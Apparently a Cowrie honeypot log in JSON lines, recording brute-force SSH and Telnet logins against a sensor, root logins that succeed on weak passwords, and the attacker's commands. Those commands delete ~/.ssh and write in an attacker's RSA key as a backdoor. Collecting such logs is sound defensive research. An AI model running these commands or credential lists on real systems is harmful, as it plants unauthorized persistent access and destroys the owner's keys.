{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:02:58.578893Z","src_ip":"212.227.235.229","session":"498da97992fb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T16:02:58.738971Z","session":"498da97992fb"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:04:07.950046Z","src_ip":"212.227.235.229","session":"498da97992fb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63556,"dst_ip":"1.2.3.4","dst_port":22,"session":"52989a057dd5","protocol":"ssh","message":"New connection: 217.72.205.35:63556 (1.2.3.4:22) [session: 52989a057dd5]","sensor":"my-vps","timestamp":"2025-08-26T16:04:17.024836Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:04:17.026138Z","src_ip":"217.72.205.35","session":"52989a057dd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57846,"dst_ip":"1.2.3.4","dst_port":23,"session":"471b1cdea8e7","protocol":"telnet","message":"New connection: 212.227.235.229:57846 (1.2.3.4:23) [session: 471b1cdea8e7]","sensor":"my-vps","timestamp":"2025-08-26T16:05:04.445648Z"}
{"eventid":"cowrie.session.closed","duration":8.259238481521606,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:05:12.704781Z","src_ip":"212.227.235.229","session":"471b1cdea8e7"}
{"eventid":"cowrie.session.connect","src_ip":"71.15.153.51","src_port":38496,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f60dc17b383","protocol":"telnet","message":"New connection: 71.15.153.51:38496 (1.2.3.4:23) [session: 0f60dc17b383]","sensor":"my-vps","timestamp":"2025-08-26T16:05:14.436235Z"}
{"eventid":"cowrie.session.closed","duration":11.230066061019897,"message":"Connection lost after 11 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:05:25.666230Z","src_ip":"71.15.153.51","session":"0f60dc17b383"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":49182,"dst_ip":"1.2.3.4","dst_port":22,"session":"c831cc2c0f2f","protocol":"ssh","message":"New connection: 193.32.162.145:49182 (1.2.3.4:22) [session: c831cc2c0f2f]","sensor":"my-vps","timestamp":"2025-08-26T16:05:53.626348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:05:53.627445Z","src_ip":"193.32.162.145","session":"c831cc2c0f2f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T16:05:53.657690Z","src_ip":"193.32.162.145","session":"c831cc2c0f2f"}
{"eventid":"cowrie.login.failed","username":"geyser","password":"geyser","message":"login attempt [geyser/geyser] failed","sensor":"my-vps","timestamp":"2025-08-26T16:05:53.749298Z","src_ip":"193.32.162.145","session":"c831cc2c0f2f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:05:54.781820Z","src_ip":"193.32.162.145","session":"c831cc2c0f2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43768,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b9c5c0a64e3","protocol":"ssh","message":"New connection: 212.227.235.229:43768 (1.2.3.4:22) [session: 9b9c5c0a64e3]","sensor":"my-vps","timestamp":"2025-08-26T16:06:35.645562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:06:35.646331Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:06:36.013525Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.login.success","username":"root","password":"AAA123456","message":"login attempt [root/AAA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:06:37.491619Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:06:38.230810Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:06:38.231477Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:06:38.232346Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:38.593313Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:06:39.423196Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T16:06:39.424029Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44378,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b86f1e3298f","protocol":"ssh","message":"New connection: 212.227.235.229:44378 (1.2.3.4:22) [session: 0b86f1e3298f]","sensor":"my-vps","timestamp":"2025-08-26T16:06:39.710789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:06:39.715503Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T16:06:39.785781Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:39.786705Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:06:39.977496Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43784,"dst_ip":"1.2.3.4","dst_port":22,"session":"611e4f5674b1","protocol":"ssh","message":"New connection: 212.227.235.229:43784 (1.2.3.4:22) [session: 611e4f5674b1]","sensor":"my-vps","timestamp":"2025-08-26T16:06:40.144529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:06:40.145153Z","src_ip":"212.227.235.229","session":"611e4f5674b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:06:40.504867Z","src_ip":"212.227.235.229","session":"611e4f5674b1"}
{"eventid":"cowrie.login.success","username":"root","password":"kevin1","message":"login attempt [root/kevin1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:06:41.030969Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:06:41.575967Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:06:41.576689Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:06:41.578066Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T16:06:41.984009Z","src_ip":"212.227.235.229","session":"611e4f5674b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:42.403191Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:06:42.991025Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T16:06:42.991685Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.259235Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.260082Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.353782Z","src_ip":"212.227.235.229","session":"611e4f5674b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35218,"dst_ip":"1.2.3.4","dst_port":22,"session":"77c34cfa3c89","protocol":"ssh","message":"New connection: 212.227.235.229:35218 (1.2.3.4:22) [session: 77c34cfa3c89]","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.537034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.539737Z","src_ip":"212.227.235.229","session":"77c34cfa3c89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59638,"dst_ip":"1.2.3.4","dst_port":22,"session":"01c1ac8ffd43","protocol":"ssh","message":"New connection: 212.227.235.229:59638 (1.2.3.4:22) [session: 01c1ac8ffd43]","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.712341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.713286Z","src_ip":"212.227.235.229","session":"01c1ac8ffd43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:06:43.814199Z","src_ip":"212.227.235.229","session":"77c34cfa3c89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:06:44.072772Z","src_ip":"212.227.235.229","session":"01c1ac8ffd43"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:06:45.558871Z","src_ip":"212.227.235.229","session":"01c1ac8ffd43"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T16:06:45.674795Z","src_ip":"212.227.235.229","session":"77c34cfa3c89"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:45.920497Z","src_ip":"212.227.235.229","session":"9b9c5c0a64e3"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:45.921287Z","src_ip":"212.227.235.229","session":"01c1ac8ffd43"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:46.951316Z","src_ip":"212.227.235.229","session":"77c34cfa3c89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35226,"dst_ip":"1.2.3.4","dst_port":22,"session":"066a28be61de","protocol":"ssh","message":"New connection: 212.227.235.229:35226 (1.2.3.4:22) [session: 066a28be61de]","sensor":"my-vps","timestamp":"2025-08-26T16:06:47.202164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:06:47.206192Z","src_ip":"212.227.235.229","session":"066a28be61de"}
